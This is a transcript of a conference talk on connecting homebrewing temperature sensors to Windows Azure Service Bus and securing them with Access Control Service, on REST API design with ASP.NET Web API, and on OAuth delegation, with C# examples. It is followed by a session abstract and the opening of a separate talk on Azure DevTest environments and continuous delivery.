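    var topic = TopicClient.CreateFromConnectionString(connectionString, "sensordata");
    var reading = new BrokeredMessage(21.5);        // the temperature as the message body
    reading.Properties["SensorId"] = "sensor-0042"; // who sent it
    topic.Send(reading);

    // Worker side: pull readings off a subscription at its own pace, on as many workers as you like.
    var subscription = SubscriptionClient.CreateFromConnectionString(connectionString, "sensordata", "workers");
    BrokeredMessage message = subscription.Receive();
    if (message != null)
    {
        double celsius = message.GetBody<double>();
        // ... aggregate / store ...
        message.Complete(); // done processing: remove it from the subscription
    }

The point of the pattern is exactly what the talk describes: the sender and the receiver never talk to each other directly, so either side can scale, crash or pause without the other noticing.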
With this approach, you basically get all that data in the queue, process it on your own pace and you don't have to care about the fact that you have 10 million sensors and only two workers processing this data. Workers can also fail independently. So imagine that you are running your own solution posting data from sensors to your own server and you might come up with a brilliant idea of having groups of sensors. The first million connects to that server, the second million connects to that server and so on. If that's the case and one of those servers fails, a lot of data is still being processed but not of those one million assigned to that one specific server. In the case of using Windows Azure service bus, your data still gets in. A worker may crash but the data will be processed by the other workers that are in there. Also, I decided to connect the sensors directly to the service bus. My initial thinking was, okay, so I have these sensors. Maybe those sensors can post data to my own servers and then from those servers, I will be posting the data into the service bus. Nice approach. I get my own domain name for posting data there but it's kind of hard because again, if I have a lot of sensors posting data, I have to scale this tiny layer which is my API accepting all those messages from the sensors which then push it on to the service bus, which is kind of stupid because I have to pay a lot for that intermediate layer there accepting requests and putting it on the service bus while it's actually not doing anything useful except taking data and putting it on the service bus. So I decided to just use service bus directly and sensors will connect directly to the service bus. Which is interesting because service bus, it's running on Windows Azure. It's designed to scale. It's designed to go to big web farms so they just have enough endpoints there to handle all my sensors for the service bus. Now one problem when doing this is if you have a lot of sensors and only one service bus, how do you do authentication and authorization? How do you know that a specific sensor can actually post data into your service bus? How do you know someone is not just distributed denial of service attacking your service bus with bogus data? Again, those workers are filtering out bogus data but if someone is just posting temperature values above 50 degrees continuously, they do a lot of work for nothing and my queue is filling for nothing because I don't want to process that data. So you want to have some authentication or authorization mechanism in there. Now who of you has been using service bus? Not too many. The interesting thing is if you create a service bus namespace on Windows Azure, you also get an access control service namespace with that. So if you create a service bus namespace through the portal, let's go there. Where is it? Service bus. I have my brew buddy service bus there. I have my queues and my topics and my relays and all that information in there. But I don't have any authentication info here except this one user which can post and read data from this service bus topic. If you just take the namespace of your service bus, add dash sb and put access control.windows.net after it, you get this thing. So you get your access control service for service bus. Interesting thing there is you can create service identities. So by default when you create your own service bus namespace, you will only get this owner in there. Interesting thing is I can add users there. 
So for every sensor I have, I just add one user which is allowed to post data to my service bus. How do those sensors get limited on what they can do with the service bus while using the rule groups? So whenever you connect to ACS, whenever you are using the access control service, every authentication step you do there is validated through these rule groups. So if we go to the rule group for brew buddy, you will see that we, sorry, it's this one for service bus, you will see that we get a number of these actions in there. And if we have a look at those, I'm just going to open a couple of them. You will see that if the owner is coming in, so the traditional owner you get for the service bus, I'm giving it a claim called action with the value listen. So if the owner connects the service bus, he is allowed to listen on the service bus topic. Next rule, if the owner comes in, he also gets the send rule. Next rule, if the owner comes in, he also gets the manage rule. So you see you can actually specify which user on service bus can do which operation. The owner of course can do every operation, but your sensors, well, just give them the send claim. So they can send data to the service bus topic without being able to consume the messages on there, without being able to manage the service bus. So that's what I did there. I just added some logic in making sure that all this works nicely. So you don't see any sensors in here. So let's add a sensor in there. So the architecture is slightly different. We also have access control service managing all the access to my sensor topic on Windows Azure service bus. So if you do this, how do we link a sensor? Well, sensors have an ID or maybe if you have a lot of sensors and you really are making money out of this solution, maybe in the factory where they create those sensors, you put in an ID, a unique identifier on the flash chips in that sensor, and you use that one to authenticate with. So that's what I did. In my taskbar, you will see that there's this nice little application with a pint icon, which states that it is currently not linked to brewbody.net. So you will see that it's not embedded drawing on screens. So it's not linked to brewbody.net, but you see there's a sensor ID in there. The only thing I have to do is copy that sensor ID, and I hope this works because I am really bad at writing multi-threaded Windows Forms application. It doesn't work. Awesome. That's the thing with demos. I've tried this like in the past two hours for a couple of times and now it doesn't work. But I know a way to fix this. No, I don't know a way to fix this. Come on. Okay, I'm going to restart that thing. So, Control Alt-T, Task Manager. Let's stop our sensor and let's restart it as well. It's this one. So the sensor has an ID. I can copy the ID to my clipboard, and go to the brewbody.net websites, which is this one, and link a temperature sensor. Now, to show that this actually works, I'm going to create a new brew. So let's go to my recipes, create a new brew of this one. Let's call it another batch. I'm going to say it's currently from an implementation stage. Next thing I can do is link a temperature sensor, put the sensor ID in there, and link this sensor. Easy as that, and data should be coming in. If I now click my sensor icon, you will see that it's now linked to brewbody.net. So all I did was copy in the sensor ID, and behind the scenes, what happens is in the service identities, I now have my sensor ID as well. 
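For completeness, here's roughly what the sensor side does with that identity once it has been provisioned: it authenticates against the -sb ACS namespace with its sensor ID and key, and because its rule group only issues the Send claim, sending is all it can do. The namespace, topic name, ID and key below are placeholders; the real sensor code isn't shown in the talk.

    using Microsoft.ServiceBus;
    using Microsoft.ServiceBus.Messaging;

    // The sensor's ACS service identity: the name and key the website provisioned for this sensor.
    var tokenProvider = TokenProvider.CreateSharedSecretTokenProvider(
        "3f2c9a-sensor-id", "base64-sensor-key==");

    // Connect to the Service Bus namespace using that identity.
    var address = ServiceBusEnvironment.CreateServiceUri("sb", "brewbuddy", string.Empty);
    var factory = MessagingFactory.Create(address, tokenProvider);

    // Allowed: sending a reading. Listening or managing would be rejected,
    // because ACS only issues the Send claim for this identity.
    var client = factory.CreateTopicClient("sensordata");
    client.Send(new BrokeredMessage(19.8));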
So you see that the brewbuddy.net website added the sensor ID in there to make sure that it can send data to the Service Bus topic. If I go to the rule groups, you will also find it in there somewhere; one of those rules, this one probably, states that this sensor ID can perform an action on my Service Bus, namely sending data. So I've basically automated the provisioning of users on Service Bus so that they can send data to my Service Bus topic. How do you do that in code? Well, that's actually quite simple. That's my brew service. If I want to link a sensor, what I want to do is use the service management wrapper for Azure Access Control. That's actually a hard one to write, but luckily on NuGet there's a package called FluentACS which you can use to do all these things. So I'm checking whether a rule already exists for this sensor, and if it exists, I'm deleting that rule. Next, I'm creating a new service identity which has the sensor ID as the username for the sensor. I'm also creating a service identity key, which is the password for my user. In this case, just for demo purposes, username and password are the same thing, but if you are doing this in a more professional application, you would take something that's embedded in the firmware and maybe some key you give to the user on a plastic card, just to make sure that no one else can send data to this Service Bus topic. Next, I'm saving those service identities and adding a Send claim for this service identity, and that's basically it. So everything I did through the portal, everything you can do through the portal, you can also do using an API. And this is a really interesting way of managing who can send data to, or consume data from, the queue you have there. Unlinking is exactly the same: I'm just checking whether there is a rule for the sensor, and if the rule exists, I'm removing it. And you will see, if I do that, that quite immediately the sensor is unlinked from my brew. So if I go there, I'm going to select it so I can link it again, and I unlink this thing. You will see that on Service Bus, my service identity for the sensor has suddenly disappeared. So I'm just communicating with ACS and making sure that only specific users can send data to this thing. Also in here, you will see that my sensor is now no longer linked to BrewBuddy, and I can link it again and so on. Okay, cool. So we can now link a sensor to our brew, and that's quite interesting to do. The next thing I thought about for this application, if you want to build your own social brewing application: we have sensors, we have all that stuff for managing our recipes, but how do you become popular nowadays on the internet? By building an API. So that was the next thing I thought about for this application. If you look at how we've been consuming the web over the previous years, you will see that we've been using desktop browsers, and then in the early 2000s or so, Sony Ericsson came with these little web browsers. I don't know who has used those in the past. Very crappy internet sites, but you could still do some mobile browsing there over a very, very slow connection. Then suddenly this new smartphone came.
iPhones, androids came, Windows phone came, and everyone started consuming the internet not by using a mobile browser, not by using a browser which was rendering text, nor by native applications running on top of those devices. So if you look at how you are consuming, for example, I always check the weather in the morning. I don't do that by navigating to a website showing me the weather. I just have an app on my smartphone which I fire up, it loads the data, and I'm consuming that data in that application. So I'm still consuming the web, but only the data one service has to offer there. Tablets came around, tablets again have their own native applications, and I kid you not, you will see fridges, you will see smart thermostats, you will see a lot of devices also connecting to the internet. Maybe if you think a fridge will never connect to the internet while Samsung, the guys who have a smartphone in every format, this is their biggest smartphone, a fridge. So you can, if you're a Twitter addict, you can tweet in the morning that you are taking something out of your fridge. You can see the weather on there, a lot of applications are on there, and they are all fetching data from the internet. So more and more devices are making use of that stuff. Just to prove my point, and I hope this time it works, but sometimes people tend to just use the website. Who of you is on Twitter or Facebook? Okay, most of you. How many of you are only using the websites to consume Twitter or Facebook? No one. Yes, I'm proving my point. So no one is actually using the website there. Everyone is probably using applications on their smartphone, on their tablets to consume Twitter to post their status updates and so on. So I think those two websites, they have great data, they have a valuable service, they have all these social features and so on. But I think the growth that they've seen, a lot of that growth is thanks to having an API for that application. So as the French say, let's make everyone happy. So what is an API? It's just a software to software interface, which is not telling a lot of things because if you're developing your own class library, you're basically also creating an API. You're just creating an interface that each other may use to connect to your code, to connect to your application and so on. So that's an API. A lot of blah, blah on this slide, but an API in the modern world or the APIs I wanted to have in my application are the REST-based APIs that have a URL which give back JSON data and so on. So really the modern API that is running on the web. If you want to build your own API, make sure you think about building an API. You want to have something valuable. I don't think anyone will be interested in having another API giving you the possibility to reverse a string or maybe base 64 encode a string or something. There's APIs doing that, but I don't think there's much value in putting them out there. A valuable API may be exposing your weather data. It may be exposing recipes on BrewBuddy. That may be valuable. Some people may like to build an application for consuming their recipes there, so they don't have to open their web browser while brewing, but they can just use an app on their smartphone to check the recipe. APIs also have to be flexible. You are not in control of the clients of your API, typically if you're building a public API on the Internet. People may start building applications on top of that API. 
The last thing you want to do is break the functionality they currently have, because that would mean no one using those applications can no longer use your websites or your web application. You have to think in terms of being backwards-compatible or versioning of the API messages and so on to make sure that everything you are offering today can still be offered afterwards. You have to be really flexible. If you add a property, don't require that property, but just make sure that older clients not supporting that property on a given object can still connect to the API. Manage your API. Again, the last thing you want to have is that your website is running, but those users who have their kettle on the fire and are brewing that beer are not able to use the application they have on their smartphone. So you have to manage this thing, you have to support this thing, make sure it's up and running. If you look at Twitter and Facebook, for example, they have these nice API status pages where you can navigate to and you can see the status of every API endpoints and be sure basically about what they are offering and what services may be down at a given point. And most of all, have a plan. Don't just put something out there. Think about what you are going to put out there, where you want this API to evolve afterwards, because it may be a technical thing that you are offering to your users, but still it's a way of consuming your data, of consuming your service. And you want to make sure that you have a plan there, how you want this API to evolve over the years. But the basic idea of those APIs is reaching more clients, either by building your own apps for those devices or either by having other people like fans of your website build those apps for your website. Doing that in ASP.NET, Web API is a logical step if you are in the.NET ecosystem. There's a couple of other frameworks. There's Nancy Avix, there's other Sinatra-based APIs that you can use to build your application. But ASP.NET's Web API is quite a nice one to work with. Anyone worked with that before? Okay, quite a couple. For those who didn't raise their hand, did you work with ASP.NET MVC, for example? Okay, I see a lot of nuts. So ASP.NET Web API is very similar to ASP.NET MVC. What you have is a framework to build HTTP services which use a RESTful model. So you can have resources which represent some data or service in your API. You can add validation, you can add things like, imagine you want to consume a recipe of your brew. And with that recipe, imagine you can take a picture of your brew. So you have a picture to refer to if you are consuming the website. How would you build an API for consuming both the recipe and both that picture? Well, there's two ways there. In my opinion, wrong way of doing that is having two endpoints. Two URLs, one for the image, one for the recipe. That's bad. Because HTTP, if you're using HTTP-based APIs, you have this content type header which you can use. And if you just have recipe slash some idea of the recipe, if you're giving that endpoints the accept header, for example, that you accept an image, well, then the API can simply return an image. If you ask it to return a JSON data file, you just return a JSON data file there. So ASP.NET Web API comes with functionality for all those things. So it's really easy to be building an API. Now, one thing to make sure is that you are quite detailed when building the API. So since everything is running on top of HTTP, there's a lot of things you can do. 
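To make that single-URL idea concrete, here is a minimal ASP.NET Web API sketch: one resource URL, and the Accept header decides whether you get the picture of the brew or the recipe data. RecipeStore and the Photo property are made-up placeholders; this is not the actual BrewBuddy code.

    using System.Linq;
    using System.Net;
    using System.Net.Http;
    using System.Net.Http.Headers;
    using System.Web.Http;

    public class RecipesController : ApiController
    {
        // GET /api/recipes/42
        public HttpResponseMessage Get(int id)
        {
            var recipe = RecipeStore.Find(id); // hypothetical data access
            if (recipe == null)
                return Request.CreateResponse(HttpStatusCode.NotFound);

            // If the client asked for an image, return the photo of the brew...
            if (Request.Headers.Accept.Any(a => a.MediaType == "image/png"))
            {
                var response = new HttpResponseMessage(HttpStatusCode.OK)
                {
                    Content = new ByteArrayContent(recipe.Photo)
                };
                response.Content.Headers.ContentType = new MediaTypeHeaderValue("image/png");
                return response;
            }

            // ...otherwise let Web API's content negotiation serialize it as JSON or XML.
            return Request.CreateResponse(HttpStatusCode.OK, recipe);
        }
    }

In a larger API you would more likely plug in a custom MediaTypeFormatter for the image case instead of inspecting the header by hand, but the idea is the same: one resource, many representations.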
You have status codes and status messages. If you are querying your API and you want to retrieve a recipe from the database and that recipe does not exist, don't just throw an error. Return an HTTP 404 status code and say the recipe has not been found. HTTP already contains those status codes and already contains a means of transporting those error messages across the wire. So make sure that you are using those. Also be detailed. There's a lot of status codes. There's a status code 401, for example, which tells the user that they are not authorized to use a specific resource or they are not authenticated if they get a status code 403. So be detailed in those status codes so the user of your API knows exactly what he is doing or not seeing. And there's actually a nice RFC who likes reading RFCs. I don't, but I actually read this one, which is RFC 2324 or the HTCPCP, the hypertext coffee pot protocol. It's an April Fool's joke from the guys doing the internet, basically. But it's kind of an interesting thing of looking at an API. They have a lot of extensions on top of HTTP. They have detailed error messages and so on. So what I want to do is show you how you can be detailed in your error messages. And yes, I have too much time on my hands sometimes. I actually built this hypertext coffee pot protocol using ASP.net web API. So you can use this one as well. Just go there. It's running on a free Azure website. So don't use it too often or my quota will just die and the website will die. But you get some examples there of how you can consume this API. So if I'm using Fiddler and I want to start brewing a pot of coffee, I can simply use the brew keyword. I'll show you this. Use the brew keyword instead of post instead of using get. I post this to a specific resource, which is one specific pot of coffee which is sitting on that server. I tell it that I am sending a message of the coffee pot type. I'll show that one in a second. I accept milk and cream. Actually, I don't accept milk and cream. I like my coffee black. So let's remove that one. And my message body will be, well, a coffee message body saying I want to start brewing. Fiddler is showing this in red because it doesn't know the brew keyword. But I added it to this API and I can just execute this thing on my coffee pot. The result of this call 201. Again, be detailed. So I created this brew, which means I have to return a 201 status code and say, well, the coffee pot has been created. 201 created. Be detailed. Now, if I do the same and I ask coffee pot number one, for example, to brew my coffee, you see that I'm getting back a 418 error message which is specified in that hypertext coffee pot control protocol which is stating HTTP error 418. I'm a teapot. So I cannot brew in there. Be detailed about what you are doing. Give detailed messages about what your API is returning there. So I did all of that. I built my API into brew body. But a lot of public APIs are kind of weird. Because think about it, if you're connecting your Twitter application or your Facebook application to Facebook for the first time, what you do is you don't want to give your credentials to that application. The last thing you want to do is give your Facebook credentials to some strange application you just installed. So what most of those applications do is they redirect you to Facebook. You log in with Facebook and then Facebook tells the application that that application can do some stuff on your behalf. 
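Going back to being detailed with status codes for a moment, here is a hedged Web API sketch of a create request answered with 201 Created plus a Location header, and a lookup answered with 404 and a message. Brew, BrewStore and the "DefaultApi" route name are assumptions (the route name is just the project-template default), not code from the talk. And to be precise on the two other codes mentioned: in HTTP, 401 signals a request that is not authenticated, while 403 signals one that is authenticated but not allowed.

    using System;
    using System.Net;
    using System.Net.Http;
    using System.Web.Http;

    public class BrewsController : ApiController
    {
        // POST /api/brews
        public HttpResponseMessage Post(Brew brew)
        {
            if (!ModelState.IsValid)
                return Request.CreateErrorResponse(HttpStatusCode.BadRequest, ModelState);

            var created = BrewStore.Add(brew); // hypothetical persistence

            // 201 Created, with a Location header pointing at the new resource.
            var response = Request.CreateResponse(HttpStatusCode.Created, created);
            response.Headers.Location = new Uri(Url.Link("DefaultApi", new { id = created.Id }));
            return response;
        }

        // GET /api/brews/42
        public HttpResponseMessage Get(int id)
        {
            var brew = BrewStore.Find(id);
            return brew == null
                ? Request.CreateErrorResponse(HttpStatusCode.NotFound, "No brew with id " + id)
                : Request.CreateResponse(HttpStatusCode.OK, brew);
        }
    }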
So that application is not telling Facebook or not telling Twitter that it is you. It's just telling that it's acting on behalf of you. So your API consumer, the application you have there, is not your user. Which is kind of difficult. How would you tackle this? Well, a good thing is a lot of websites do this, take this approach using OAuth. What you have is something like this website where they put a link, sign in with Twitter. I click that link and I'm being redirected to Twitter. And Twitter knows this application. They know the client application that is requesting access to your data. So as you can see, there's this token in the URL that they are using to recognize the client application that wants to connect here. I log in. Twitter asks me if I want to grant access yes or no. Once done, they redirect me back to the application and I'm logged in. They can see my picture. They can see my friends on Twitter. Basically, all the information I allowed the application to get. Yet, I can simply go to Twitter and say this application can no longer access my data. Because the application is not being logged in as myself, it's doing stuff on behalf of me. And that's a very important thing to realize there. If you want to build this yourself, if you want to build your own OAuth flow and make sure that you can have this flow of being redirected to the application, having to log in on your application and being redirected back, there's actually quite a lot of code you have to implement for that. You have to have an authorization server. You have to keep track of which user granted access to which application, which can consume your data and so on. So it's quite difficult to do. Luckily, there's a nice hidden feature in the access control service which can do a lot of the heavy lifting there for you. So if you want to build OAuth or you want to use OAuth in your client, you can actually delegate a lot of that work to the Azure Access Control Service. So what would happen is if I have an API consumer, imagine I have a client application wanting to connect to BrewBuddy. I have that consumer. I have my application. What will happen is the API consumer goes to brewbuddy.net, redirects me and asks me to log in yes or no. And if I want to give access to this application. On BrewBuddy, I click yes or no. And if I click yes, I simply call into the access control service again using this management API. And I tell them to basically know that this API consumer, this application is allowed to access the website and all the services sitting there on my behalf. Next thing that happens is the API consumer has to get a little token to prove to BrewBuddy that it's actually been validated. To prove that it's acting on behalf of me, that can act on behalf of me to just view my recipes and so on. To get that token, you don't have to implement anything. You just use ACS. Simply telling ACS that a client will come someday asking for a token proving that it can act on behalf of a specific user while you can delegate all that to access control service. So let's give you a very quick demo because I only have seven minutes left. So I have my BrewBuddy website. I can do whatever I want there. BrewBuddy knows one client application, which is this one, my Brew recipes. Again, based on service identities in ACS, I created a service identity identifying my client application. So this client application is simply a third party website that wants to use the data coming from BrewBuddy.net. 
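Before the demo, here is roughly what the call looks like from the consumer's side once it has exchanged that code for a token: the token simply goes into the Authorization header of each request. The URL is made up, and the exact header scheme (Bearer here) depends on what the API expects from ACS-issued tokens, so treat this as a sketch.

    using System.Net.Http;
    using System.Net.Http.Headers;
    using System.Threading.Tasks;

    static class BrewBuddyClient
    {
        public static async Task<string> GetRecipesAsync(string accessToken)
        {
            using (var client = new HttpClient())
            {
                // The token proves this app acts on behalf of the user; it is not the user's password.
                client.DefaultRequestHeaders.Authorization =
                    new AuthenticationHeaderValue("Bearer", accessToken);

                var response = await client.GetAsync("https://www.brewbuddy.net/api/recipes");
                // Throws on failure, e.g. 401/403 if the user has revoked the delegation.
                response.EnsureSuccessStatusCode();
                return await response.Content.ReadAsStringAsync();
            }
        }
    }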
So I have this thing running in my Visual Studio. Well, I don't have it running, so I have to start it. It's this little website, a very ugly website by the way, which says it wants to fetch recipes from BrewBuddy. This is not BrewBuddy, but it's been granted access to consume recipes on BrewBuddy; it's been granted access to use the API on BrewBuddy, but not on my behalf yet. So this application is known by BrewBuddy and it can connect to the API, but I haven't told it yet that it can actually access my data. So if I click login on that website, I'm redirected to BrewBuddy, where I have to log in. Once I log in, it will ask me if I want to authorize this My Brew Recipes application to work on my behalf, to retrieve my recipes and to access my friend list. If I say no, it takes me back to the application and nothing happens. If I click yes, a delegation is written in Azure Access Control, and now my client application, in this case My Brew Recipes, can connect to my API. So I'm redirected back to My Brew Recipes, and you see that I get back this code, which basically states that I have been authorized by BrewBuddy to access this thing. I step through my code, I can see that I'm now authorized and that there's no error. The next thing I can do is simply call the API on BrewBuddy. So you can see that I'm now calling this API live on the internet and just getting the data from there, and I'm getting back the recipes. It's kind of easy to do, but you probably don't want to implement the entire flow yourself, because it's quite hard to do, and quite hard to do right and in a secure fashion. But remember that you can just use ACS for that. And it's sort of a hidden feature, because you have those service identities sitting in Azure Access Control, and I can see My Brew Recipes has been registered, but I cannot see all the users that granted access to the API. The fun thing is, if you are using the service management API for ACS, you can actually see that. You can view which users have been granted access to that thing. I have a small sample showing that, and I should have started it before, but let's try. So that's this one, the delegations viewer. There we go. This thing is also using the management API. It's connecting to my BrewBuddy service, and as you can see, up until here that's all data I can see in the ACS management portal. But all the users that are allowed to access my API are these guys. You cannot see them through the management portal, but if you are using the API to work with ACS, you can see them. And that's what it bases itself on to grant you access to the API or not. Don't build this yourself; have ACS do all that for you. If you want ACS to do all that for you, I've created a NuGet package for that. So that's this one. It's all open source. If you find any bugs, please feel free to fix them for me, or if you don't want to fix them, just email me and I will try to fix them. If you want to delegate all that work to Windows Azure Access Control, this package adds all the plumbing into your project to do that. So, as a takeaway from this session: I hope some people will start brewing beer. The cleaning is not fun, but you have to do it in order to get some nice end results afterwards. We've seen Websites, which is a great platform to just deploy something, test your idea, and make sure that the things you were thinking about, like getting money out of it, are working.
In case they are working, you can scale out, scale up to multiple instances, scale out to reserved instances and so on. So it's really ideal to just throw your stupid idea on the Internet while stupid idea and start working on it and make sure that maybe it will work, maybe it will not work. You can combine services at will. So in this case, I've been using Windows Azure websites with SQL Azure with the Worker role with sensors with Service Bus. You just take the things that you need for your solution. You don't have to use the entire Windows Azure platform. If you want to have your own web server running the website, but still want to make use of the Service Bus, you can do that actually. Service Bus is a very nice thing to work asynchronous and to scale out. I've been using, there's actually a nice example of that. The company I worked previously, they were gathering sensor data as well. By using the Service Bus, they only needed like two servers to process all the incoming messages instead of having all this entire web form of servers running IAS and accepting all those calls coming in. So it's a great thing for asynchronous. If one of those workers crashes, no worries because everything will still arrive in the Service Bus and you can still pull that data out afterwards. Access control for devices, use those claims to grant access to write data on to the Service Bus or to deny data from the Service Bus. If you're building a web API and you need your own security mechanism and you are planning into using OAuth, make sure you look at the Access Control Service because it can actually do a lot of the heavy lifting for you there. So with that, I thank you for being here and I'll enjoy the rest of the conference. Thanks. So if you have any questions, feel free to come up.
|
Inspired by one of the Windows Azure gods (Wade Wegner), Maarten decided to order a homebrewing starter kit. Being a total cloud fanboy, he decided to hook those delicious creations to the cloud. Join Maarten and discover how you can connect a USB temperature sensor to Windows Azure to monitor brewing and fermentation temperatures. He'll show you how to do distributed, social brewing in this fun yet practical session on an interesting use case for the cloud: beer.
|
10.5446/51471 (DOI)
|
All right. Welcome to this session. You guys are the cool ones, that's for sure, because you have understood that it's this session room that you're supposed to be right now. This is the one session in this time slot which is important because DevTest, as we all know by now, there's been actually plenty of continuous deployment talks in this conference. And DevTest, for your environments, is extremely important. In fact, you look brilliant out there. This is you, actually. Did you stretch today? This is you, guys. It is very important to be fast, to be slick, and to be cool, and that's what we all want to be. And we're going to talk about that today in the terms of things like this. Has your boss ever come into your office demanding a new test, a new demo environment for a customer presentation? Has that ever happened to you? And you were like, what, now? And he's like, yeah, now. If I wanted it tomorrow, I'd swing by in the morning, right? That's right. And the testers, we got to get the latest builds on the test server because otherwise that story won't be part of the sprint goal. Has that ever happened to you? I don't know that all testers sound like that, but they kind of sound like that to us when they come in, right? That's what they sound like. Any testers in the room? No, nobody wants to raise their hand now. And also, I mean, did any of you ever deploy the connection string, the development connection string to live production? Anybody? Yeah, a couple of us. This has happened to me. It's not fun because way back when on this platform, the Windows Azure platform, it took about 20 minutes if we were lucky to deploy something, right? That's about the time that it took. And there really wasn't any checking for any errors or anything. So if you made the tiniest bit of mistake like dev connection string settings, right, you had to go and do it all over again. You have to wait another 10, 20 minutes to get there. It was just frustrating. But now, today, we get almost instant deploy times to Azure. And you get some warnings for many of the errors that you didn't get before. And also, the boss, the testers, the stuff that we're going to talk about here today is going to make these guys go away for good. It's going to leave you in this then state of development where you can just focus on the undisturbed development experience because that's what we all want. My name is Magnus Martenson. I'm a Windows Azure most valuable pilot. I work for Active Solution in Sweden. It's a.NET shop. And what we do is build.NET solutions for our customers and a bunch of Windows Azure, of course. I also love doing community work. I got to point this out, the Global Windows Azure Boot Camp. Anybody in the room attended one of those? Yeah, there's a couple of them. You were in the Oslo one? No? Australia. Well, welcome here, sir. Welcome. Australia. That's awesome. Australia had three locations, as I recall. There were 92 on April 27th. There were 92 locations worldwide that did this Global Windows Azure Boot Camp event. It was a full day workshop thing at every location. But we all did it on the same day. We also did a huge render lab that we did together. Every attendee could deploy the render lab and crank up a bunch of instances in Windows Azure. And all of those instances joined in a huge render farm. At one point we had about four and a half thousand instances running simultaneously. We rendered more video. That's what we did. 
We rendered more video or used more compute power than some of the earlier Pixar animation films. About eight years' worth of render time during the lab. It was awesome fun. So keep an eye out for this for next year. We're going to redo it probably even bigger. It was fun. And also I want to point out the upcoming conference, which is going to be online. So September 19th to 20th on the Internet Near You, all of these cool Windows Azure folks are going to be talking, giving presentations. They're going to be streamed online. So we have a two day full content of awesome presentations. Do check that out. Okay. Let's get going. So how many people in the room are using Windows Azure or have been using Windows Azure? That's most of you. All right. So I guess the first demo if you want is not really any news to you. I'm just going to get things going here. We'll just create a NDC. I wonder if that's available. NDC is available. Let's do that. NDC North Europe, create a website. I guess you've all seen that you get a website up and running really fast. Just wanted to make sure that we do a demo early in the presentation. Click on it and you have a website up. Okay. Cool. So what we want to do is take this little website that I have here and deploy it using web deploy. Of course, we go in and say publish. And then it seems we need to have some kind of publishing profile that I don't have. So I go into the portal and I go and download the publish profile. On my new website, save that to my local drive and pick it up inside of Visual Studio. Okay. Publish. You've seen this, right? Anybody never seen this? One. Awesome. We're doing this for you. Actually, I'm setting up the site so that we can use it for other demos. So that's why I'm doing it now. It's going to take a while. Actually, it's going to show me a browser window when it's done. And there it is. There's the web deployed website. And it's really fast to deploy and you can just go how many ever many times you like. It actually becomes faster now because it's only going to sync up the changes, the changed files and so forth. So it's not going to be as slow. Alright. So there we have it. Website, Windows Azure. Let's talk about fear for a moment. Fear of change. I use this picture to symbolize fear of change because as human beings, we don't like changes. Changes are scary. And this is of course when wagons were able to be automatically mobile on their own, right? Coming down the street without the horse in front of them. They were auto mobiles, right? And that was really awesome scary. Some people were like, ah, it's the devil's carriage. And so forth. And just to sort of cushion the blow for people, they mounted this horse's head on the front of the carriages, right? So that they would be less scared for them. And actually, some of the first designs of these had a whip holder on them because, you know, if you don't have a whip holder, we're going to put the whip, right? Of course. Makes sense. So changes are really scary. And now Microsoft is talking about a lot of changes. And this is from the keynote of TechEd. I was there last week. And I gave this presentation actually. So it's an awesome warm up for doing my presentation here at NDC. And this is from the keynote. This is Scott Guthrie. And he was pointing out that you really need to use Windows Asher for a dev test environments. And he's absolutely right. And I was sitting in the audience going like, yeah, I wanted to stand up and going, yeah, that's right. You need to do that. 
And then he showed us that when you shut down your test environments during the night, it's not going to cost you anything. So that's a good thing to do, right? Also, he went on to announce per-minute billing in Windows Azure, and I was like, hallelujah, because I've been waiting for this for a long time. It's good. Before, the billing was per hour, and not only that, it was per clock hour. So if you deployed something at five to 12, you still paid for the whole hour between 11 and 12. It maybe wasn't that much money, but it was still a nuisance. If you wanted to be really careful with your spending, you had to make sure you started your deployments just after the hour, and you didn't even bother tearing something down at 20 past; you might as well wait until five to the hour. But now it's per-minute billing, so it's very effective. And this also, I don't know how many of you know this. Did you see the keynote at TechEd? They dropped prices to almost, almost nothing. And I'll talk at the end about how you basically should use your spending. So when I put this slide up, I'm not selling Windows Azure per se, but I'm a Windows Azure MVP; I use the platform and I consult on it, so I guess the more people use it, the better it is for me. So it's sort of an indirect sale here. But still, I wanted to show you this, because it becomes kind of a no-brainer to use this now. You get some free credits every month for the MSDN subscription you're already paying for, right? So how many people in the room have MSDN? The majority have MSDN. Have you activated your MSDN free usage of Azure? Yeah, some of you have. And some of you who put up your hand for MSDN didn't put up your hand for the follow-up question. And that's the thing: you have free usage that you are already paying for. You have DevTest environments that you could use for nothing, and fast, and then it's a no-brainer to use them. And if you want something for yourself, you could go with this: if you activate this stuff now, there's a contest going on. You should get in on that, because basically you need to activate and deploy something very simple, trivial, and then you're eligible to win an Aston Martin. But don't bother, because I'm going to win it. That's mine. I'm going to get that car. All right, moving on. Continuous delivery. Now, continuous integration is when you check in or push your code and it gets built and tested. Continuous delivery is the next step, when you move your stuff into production or into DevTest environments. So picture this: you're coding away, you're pushing your code or checking it in, depending on what type of repository you use, it gets pulled out, compiled and tested, and then it gets deployed into live production. Now, I'm sure many of you would find that a little bit scary. Like, can you do that? Yes, yes, you can. You don't have to, but you can. And some companies are doing this now. I know companies that do this now. I know companies that go to production several times a day with what they have. And if you're not doing that now, if your company has been around for a long time and you're not doing this, think about startups today. Let's say a startup starts up today.
Are they going to go and take their venture capital or their savings and go to town and buy some servers and try to start hooking them up and connecting them? No, they're not. You're going to get something like Bispark or something like that for Microsoft that they get free usage. And then you're going to go and use this environment, this platform for all of their stuff. And they're going to go with continuous delivery, probably to production straight away, because that's the way they think. So if you're not doing it, think about what that kind of means to you. These other guys are going to be so much faster. Maybe you don't have to be fast, but you really want to have a streamlined environment. So these are some strong motivators to doing this. And so even if you don't go to production, I mean, you could code stuff, check it in, have it built and tested and put it on a DevTest environment. So you're always refreshing, continuously refreshing your testing environment during the day. Still, that's pretty good. That's very useful. And the setup of this is really easy. End of this talk is going to be all demos. So it really comes down, right, to these three little words. Automate, automate, automate. That's what you have to do. That's the way to set this up is through automation. In fact, everything that can be automated must be automated. I like that quote. I wonder who said that. Anyway, luckily, there is some support for this stuff in Windows Azure, right? That's what we're here to talk about. So let's talk quickly or briefly. I'm going to try to be as brief as possible about the three ways to deploy your applications to Windows Azure. The first one being virtual machines or the one that I talked about first, it was actually the last one available from Microsoft. It was the virtual machines. So running VMs, hosting VMs in Windows Azure, that's all about controlling that through PowerShell. Do we have any PowerShell gurus in the house? None. Right. I neither am I. I'm mostly a Dev, so I'm not an IT, I guess we don't have any IT pro people because they usually are wizards at this stuff. But you can do really powerful things here. You can just crank up a new server or launch a server just like that using a simple script. And it really is simple because I can write them. Like literally just a few lines of script code. Bam, you get a new server attached to a virtual network and some ports and extra disks and stuff set up. It's a one liner, really. And that's very, very powerful. And now, which wasn't the fact before, but now, since general availability, when you stop a virtual machine, it doesn't cost you anything. It used to cost you money. You had to like unhook it from your deployment 